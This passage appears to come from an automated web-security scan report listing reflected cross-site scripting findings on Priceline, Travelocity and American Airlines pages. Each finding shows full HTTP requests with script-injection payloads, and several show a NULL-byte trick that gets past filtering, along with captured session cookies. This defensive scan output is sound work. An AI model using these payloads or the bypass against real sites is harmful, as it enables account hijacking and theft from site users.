GET /privacypolicy/privacypolicy.asp?b3f4a"><script>alert(1)</script>618595210a8=1 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:19 GMT
Server: Microsoft-IIS/6.0
Content-Length: 57853
Content-Type: text/html
Set-Cookie: PSessKey=711510AC721510AC2011111313361896cd81295817; domain=.priceline.com; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights,
...[SNIP]...
<a href="?b3f4a"><script>alert(1)</script>618595210a8=1&dbg=CF0512DFBD78F3B23CF98DC16F6633E501215939E1B6F8064CD9B1BFFD3FF3EE937AD0360BF442B41D64A4AA414F8CA9B88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.11. http://tickets.priceline.com/privacypolicy/privacypolicy.asp [plf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /privacypolicy/privacypolicy.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008cd0a"><script>alert(1)</script>40d90879 was submitted in the plf parameter. This input was echoed as 8cd0a"><script>alert(1)</script>40d90879 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /privacypolicy/privacypolicy.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%008cd0a"><script>alert(1)</script>40d90879 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:26 GMT
Server: Microsoft-IIS/6.0
Content-Length: 54368
Content-Type: text/html
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights,
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%008cd0a"><script>alert(1)</script>40d90879&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.12. http://tickets.priceline.com/travel/airlines/lang/en-us/air_leavebehind.asp [lbp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /travel/airlines/lang/en-us/air_leavebehind.asp

Issue detail

The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c571'-alert(1)-'86b590b9f11 was submitted in the lbp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /travel/airlines/lang/en-us/air_leavebehind.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln&MainPage=details_ret&TimeOut=1800&lbp=v4a1c571'-alert(1)-'86b590b9f11 HTTP/1.1
Host: tickets.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=bf049cba906144f4ad9961ab6fcbc674; SETI=91F2A0C53F594DA86880E2D3EB88F0292201E89637CACE88AB5DCEFB93CA3736FA50EACEA2F76EB5B4369A79F77ECE2E4124198210D770BBB82C79331F433BA965B577A3DEBFA0A62201E89637CACE8850BB8D88F94F6CDC8B0027E8E1144B10DA6BD0C56050B6C30307BE62C3497A80; vid=v20111113132154397be127; vsch=v20111113132154397be127%5F17874400; Stick2=ID=0%7CB%7C11%2F13%2F2011+8%3A21; Referral=CLICKID=FDC%5FAIRSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=11%2F13%2F2011+8%3A21%3A54&ID=FARECAST; CJK=5164010a100011ac201111131322210e8010774369; JSessionKey=721510ac5064010a20111113132309dc6021609128; PSessKey=; WT_FPC=id=290adf770e0880aab941320965614204:lv=1321194346836:ss=1321194123541; __utma=137358961.2047494711.1320962016.1321051908.1321190524.3; __utmb=137358961.8.10.1321190524; __utmc=137358961; __utmz=137358961.1321190524.3.3.utmcsr=bing.com|utmccn=(referral)|utmcmd=referral|utmcct=/travel/; ysm_CK157FV45V2UHBGAV8MEGA5MKNTAG=ysm_PV157FV45V2UHBGAV8MEGA5MKNTAG:2&ysm_SN157FV45V2UHBGAV8MEGA5MKNTAG:1321190573730&ysm_LD157FV45V2UHBGAV8MEGA5MKNTAG:0; PLGBPOP=air_Core_B%3D111211

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:33:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 7675
Content-Type: text/html
Cache-control: private


<SCRIPT Language="JavaScript">
function vpXSellPopup(strURL, lWidth, lHeight, lXPos, lYPos, strParams, sWinName) {
   var x=(lWidth?lWidth:600);
   var y=(lHeight?lHeight:500);
   var xp = (lXPos?lX
...[SNIP]...
< 0) {
               this.window.location.href='http://tickets.priceline.com/travel/airlines/lang/en-us/air_leavebehind_v4a1c571'-alert(1)-'86b590b9f11.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pclnundefined';
           } else {    
               this.window.location.href='http://travelb.priceline.com/airlines/fareResultsLeaveBehind.do?session_key
...[SNIP]...

1.13. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /travel/airlines/lang/en-us/details_ret_bk.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26532"><script>alert(1)</script>b61b078c9ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel/airlines/lang/en-us/details_ret_bk.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln&26532"><script>alert(1)</script>b61b078c9ad=1 HTTP/1.1
Host: tickets.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tickets.priceline.com/travel/airlines/lang/en-us/confirm_status.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=bf049cba906144f4ad9961ab6fcbc674; SETI=91F2A0C53F594DA86880E2D3EB88F0292201E89637CACE88AB5DCEFB93CA3736FA50EACEA2F76EB5B4369A79F77ECE2E4124198210D770BBB82C79331F433BA965B577A3DEBFA0A62201E89637CACE8850BB8D88F94F6CDC8B0027E8E1144B10DA6BD0C56050B6C30307BE62C3497A80; vid=v20111113132154397be127; vsch=v20111113132154397be127%5F17874400; Stick2=ID=0%7CB%7C11%2F13%2F2011+8%3A21; Referral=CLICKID=FDC%5FAIRSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=11%2F13%2F2011+8%3A21%3A54&ID=FARECAST; CJK=5164010a100011ac201111131322210e8010774369; JSessionKey=721510ac5064010a20111113132309dc6021609128; PSessKey=; WT_FPC=id=290adf770e0880aab941320965614204:lv=1321194346836:ss=1321194123541; __utma=137358961.2047494711.1320962016.1321051908.1321190524.3; __utmb=137358961.8.10.1321190524; __utmc=137358961; __utmz=137358961.1321190524.3.3.utmcsr=bing.com|utmccn=(referral)|utmcmd=referral|utmcct=/travel/; ysm_CK157FV45V2UHBGAV8MEGA5MKNTAG=ysm_PV157FV45V2UHBGAV8MEGA5MKNTAG:2&ysm_SN157FV45V2UHBGAV8MEGA5MKNTAG:1321190573730&ysm_LD157FV45V2UHBGAV8MEGA5MKNTAG:0

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:34:01 GMT
Server: Microsoft-IIS/6.0
p3p: policyref="<http://www.priceline.com/w3c/p3p_exception_policy.xml>", CP="CAO DSP COR CURa ADMa DEVo TAIo PSAa PSDa OUR IND ONL NAV INT CNT STA PRE"
Content-Length: 80381
Content-Type: text/html
Cache-control: private


<SCRIPT Language="JavaScript">
function vpXSellPopup(strURL, lWidth, lHeight, lXPos, lYPos, strParams, sWinName) {
   var x=(lWidth?lWidth:600);
   var y=(lHeight?lHeight:500);
   var xp = (lXPos?lX
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln&26532"><script>alert(1)</script>b61b078c9ad=1&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.14. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /travel/airlines/lang/en-us/details_ret_bk.asp

Issue detail

The value of the path request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b144e"><script>alert(1)</script>154a7d15847 was submitted in the path parameter. This input was echoed as b144e"><script>alert(1)</script>154a7d15847 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /travel/airlines/lang/en-us/details_ret_bk.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln&path=bak%00b144e"><script>alert(1)</script>154a7d15847 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:28 GMT
Server: Microsoft-IIS/6.0
p3p: policyref="<http://www.priceline.com/w3c/p3p_exception_policy.xml>", CP="CAO DSP COR CURa ADMa DEVo TAIo PSAa PSDa OUR IND ONL NAV INT CNT STA PRE"
Content-Length: 80500
Content-Type: text/html
Cache-control: private


<SCRIPT Language="JavaScript">
function vpXSellPopup(strURL, lWidth, lHeight, lXPos, lYPos, strParams, sWinName) {
   var x=(lWidth?lWidth:600);
   var y=(lHeight?lHeight:500);
   var xp = (lXPos?lX
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln&path=bak%00b144e"><script>alert(1)</script>154a7d15847&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.15. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [plf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /travel/airlines/lang/en-us/details_ret_bk.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00784e1"><script>alert(1)</script>feea70b6100 was submitted in the plf parameter. This input was echoed as 784e1"><script>alert(1)</script>feea70b6100 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /travel/airlines/lang/en-us/details_ret_bk.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00784e1"><script>alert(1)</script>feea70b6100 HTTP/1.1
Host: tickets.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tickets.priceline.com/travel/airlines/lang/en-us/confirm_status.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=bf049cba906144f4ad9961ab6fcbc674; SETI=91F2A0C53F594DA86880E2D3EB88F0292201E89637CACE88AB5DCEFB93CA3736FA50EACEA2F76EB5B4369A79F77ECE2E4124198210D770BBB82C79331F433BA965B577A3DEBFA0A62201E89637CACE8850BB8D88F94F6CDC8B0027E8E1144B10DA6BD0C56050B6C30307BE62C3497A80; vid=v20111113132154397be127; vsch=v20111113132154397be127%5F17874400; Stick2=ID=0%7CB%7C11%2F13%2F2011+8%3A21; Referral=CLICKID=FDC%5FAIRSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=11%2F13%2F2011+8%3A21%3A54&ID=FARECAST; CJK=5164010a100011ac201111131322210e8010774369; JSessionKey=721510ac5064010a20111113132309dc6021609128; PSessKey=; WT_FPC=id=290adf770e0880aab941320965614204:lv=1321194346836:ss=1321194123541; __utma=137358961.2047494711.1320962016.1321051908.1321190524.3; __utmb=137358961.8.10.1321190524; __utmc=137358961; __utmz=137358961.1321190524.3.3.utmcsr=bing.com|utmccn=(referral)|utmcmd=referral|utmcct=/travel/; ysm_CK157FV45V2UHBGAV8MEGA5MKNTAG=ysm_PV157FV45V2UHBGAV8MEGA5MKNTAG:2&ysm_SN157FV45V2UHBGAV8MEGA5MKNTAG:1321190573730&ysm_LD157FV45V2UHBGAV8MEGA5MKNTAG:0

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:33:58 GMT
Server: Microsoft-IIS/6.0
p3p: policyref="<http://www.priceline.com/w3c/p3p_exception_policy.xml>", CP="CAO DSP COR CURa ADMa DEVo TAIo PSAa PSDa OUR IND ONL NAV INT CNT STA PRE"
Content-Length: 80381
Content-Type: text/html
Cache-control: private


<SCRIPT Language="JavaScript">
function vpXSellPopup(strURL, lWidth, lHeight, lXPos, lYPos, strParams, sWinName) {
   var x=(lWidth?lWidth:600);
   var y=(lHeight?lHeight:500);
   var xp = (lXPos?lX
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00784e1"><script>alert(1)</script>feea70b6100&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.16. http://travel.travelocity.com/trips/UpdateXFactorSelect.do [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /trips/UpdateXFactorSelect.do

Issue detail

The value of the jsessionid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6e055%20a%3dbe6dbb680481 was submitted in the jsessionid parameter. This input was echoed as 6e055 a=be6dbb680481 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /trips/UpdateXFactorSelect.do;jsessionid=6BCDBF9222795F098DDE19F1029B74A0.p0618;jsessionid=6BCDBF9222795F098DDE19F1029B74A0.p0618?SEQ=1321191103978101320116e055%20a%3dbe6dbb680481 HTTP/1.1
Host: travel.travelocity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:36:43 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28451

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--
JSESSIONID = 6BCDBF9222795F098DDE19F1029B74A0.p0618
TPSESSIONID = T0042004706111113072154205152534750467
Service = TRAVELOCITY73D3F
...[SNIP]...
<input type="hidden" name="seq" value=1321191103978101320116e055 a=be6dbb680481>
...[SNIP]...

1.17. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [batchId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/call/plaincall/HomePageUtils.reportImpression.dwr

Issue detail

The value of the batchId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ec25'-alert(1)-'ed01382554e was submitted in the batchId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /dwr/call/plaincall/HomePageUtils.reportImpression.dwr HTTP/1.1
Host: www.aa.com
Connection: keep-alive
Content-Length: 537
Origin: https://www.aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: text/plain
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

callCount=1
page=/homePage.do
httpSessionId=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65
scriptSessionId=D02033EEA12EA28758FEDA1DF13E69E0549
c0-scriptName=HomePageUtils
c0-methodName=reportImpression
c0-id=0
...[SNIP]...
-param0=Object_Object:{flash:reference:c0-e1, reportedLocation:reference:c0-e2, reportedTarget:reference:c0-e3, reportedTitle:reference:c0-e4, locale:reference:c0-e5}
c0-param1=boolean:false
batchId=08ec25'-alert(1)-'ed01382554e

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 103
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:34:48 GMT
Connection: keep-alive

//#DWR-INSERT
//#DWR-REPLY
dwr.engine._remoteHandleCallback('08ec25'-alert(1)-'ed01382554e','0',null);

1.18. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [c0-id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/call/plaincall/HomePageUtils.reportImpression.dwr

Issue detail

The value of the c0-id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e68c9'-alert(1)-'753b553cd8c was submitted in the c0-id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /dwr/call/plaincall/HomePageUtils.reportImpression.dwr HTTP/1.1
Host: www.aa.com
Connection: keep-alive
Content-Length: 537
Origin: https://www.aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: text/plain
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

callCount=1
page=/homePage.do
httpSessionId=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65
scriptSessionId=D02033EEA12EA28758FEDA1DF13E69E0549
c0-scriptName=HomePageUtils
c0-methodName=reportImpression
c0-id=0e68c9'-alert(1)-'753b553cd8c
c0-e1=boolean:false
c0-e2=string:HomePageHero1
c0-e3=string:Europe1.Sale.xml
c0-e4=string:Europe%20Flight%20Deals
c0-e5=string:en_US
c0-param0=Object_Object:{flash:reference:c0-e1, reportedLocation:r
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 103
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:34:40 GMT
Connection: keep-alive

//#DWR-INSERT
//#DWR-REPLY
dwr.engine._remoteHandleCallback('0','0e68c9'-alert(1)-'753b553cd8c',null);

1.19. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [c0-scriptName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/call/plaincall/HomePageUtils.reportImpression.dwr

Issue detail

The value of the c0-scriptName request parameter is copied into the HTML document as plain text between tags. The payload b401d<script>alert(1)</script>23908e6d004 was submitted in the c0-scriptName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /dwr/call/plaincall/HomePageUtils.reportImpression.dwr HTTP/1.1
Host: www.aa.com
Connection: keep-alive
Content-Length: 537
Origin: https://www.aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: text/plain
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

callCount=1
page=/homePage.do
httpSessionId=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65
scriptSessionId=D02033EEA12EA28758FEDA1DF13E69E0549
c0-scriptName=HomePageUtilsb401d<script>alert(1)</script>23908e6d004
c0-methodName=reportImpression
c0-id=0
c0-e1=boolean:false
c0-e2=string:HomePageHero1
c0-e3=string:Europe1.Sale.xml
c0-e4=string:Europe%20Flight%20Deals
c0-e5=string:en_US
c0-param0=Object_Object:{fl
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 412
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:34:24 GMT
Connection: keep-alive

//#DWR-REPLY
if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: HomePageUtilsb401d<script>alert(1)</script>23908e6d004' }, '0');
else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: HomePageUtilsb401d<script>
...[SNIP]...

1.20. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [callCount parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/call/plaincall/HomePageUtils.reportImpression.dwr

Issue detail

The value of the callCount request parameter is copied into the HTML document as plain text between tags. The payload 36169<script>alert(1)</script>2d3ab3c1d40 was submitted in the callCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /dwr/call/plaincall/HomePageUtils.reportImpression.dwr HTTP/1.1
Host: www.aa.com
Connection: keep-alive
Content-Length: 537
Origin: https://www.aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: text/plain
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

callCount=136169<script>alert(1)</script>2d3ab3c1d40
page=/homePage.do
httpSessionId=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65
scriptSessionId=D02033EEA12EA28758FEDA1DF13E69E0549
c0-scriptName=HomePageUtils
c0-methodName=reportImpression
c0-id=0
c0-e1=bool
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 460
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:34:20 GMT
Connection: keep-alive

//#DWR-REPLY
if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 136169<script>alert(1)</script>2d3ab3c1d40' });
else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 136169<
...[SNIP]...

1.21. https://www.aa.com/dwr/interface/CancelVPNRAjaxUtil.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/CancelVPNRAjaxUtil.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ef8da<script>alert(1)</script>4a04c56c4e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/CancelVPNRAjaxUtil.jsef8da<script>alert(1)</script>4a04c56c4e3 HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 78
Server: On-Demand Router/1.0
X-Cnection: Close
